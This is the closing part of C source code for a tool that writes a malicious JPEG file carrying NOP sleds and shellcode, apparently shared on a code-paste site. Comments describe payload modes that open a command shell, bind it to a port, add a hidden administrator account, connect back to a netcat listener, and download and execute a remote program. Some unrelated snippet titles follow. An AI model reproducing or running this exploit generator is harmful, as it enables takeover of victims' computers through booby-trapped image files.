j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3; for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout); for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout); for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout); for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs j=i; for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode5[i],fout); for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout); for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout); fprintf(fout,"\xFF\xD9"); printf("\t\tOk, Malicious JPG File Created ...\n\n"); fcloseall(); } return 0; } // You have read till here ? :) // Well code was not optimized in pourpose, so other's could add some more shellcode's // with an esy copy+paste :) // OK some examples here: //D:\C++\Debug>sacred_jpg.exe 1 [it will pop up cmd.exe] //D:\C++\Debug>sacred_jpg.exe 2 8081 [it will bind cmd.exe on port 8081] //D:\C++\Debug>sacred_jpg.exe 3 [it will add user "ASP32.NET" as an administrator] //D:\C++\Debug>sacred_jpg.exe 4 192.168.0.1 31337 //[it will connest to the 192.168.0.1 on port 31337, of course there listens nc :), nc -l -p 31337] //D:\C++\Debug>sacred_jpg.exe 5 http://yourserver.com/progam.exe [it will download and then execute program.exe] //by the way you can compile source code with VC++ 6.0
run
|
edit
|
history
|
help
0
Wide string to lowercase
Additional layer of indirection
sharedptr emptiness
Workaround for https://github.com/Project-OSRM/osrm-backend/pull/4385
Enum Class Comparisons
Computing the factorial of an integer using factorial and iteration
copy
class with unique_ptr to vector
Problem_onoff_3
Replace all spaces in a string in C++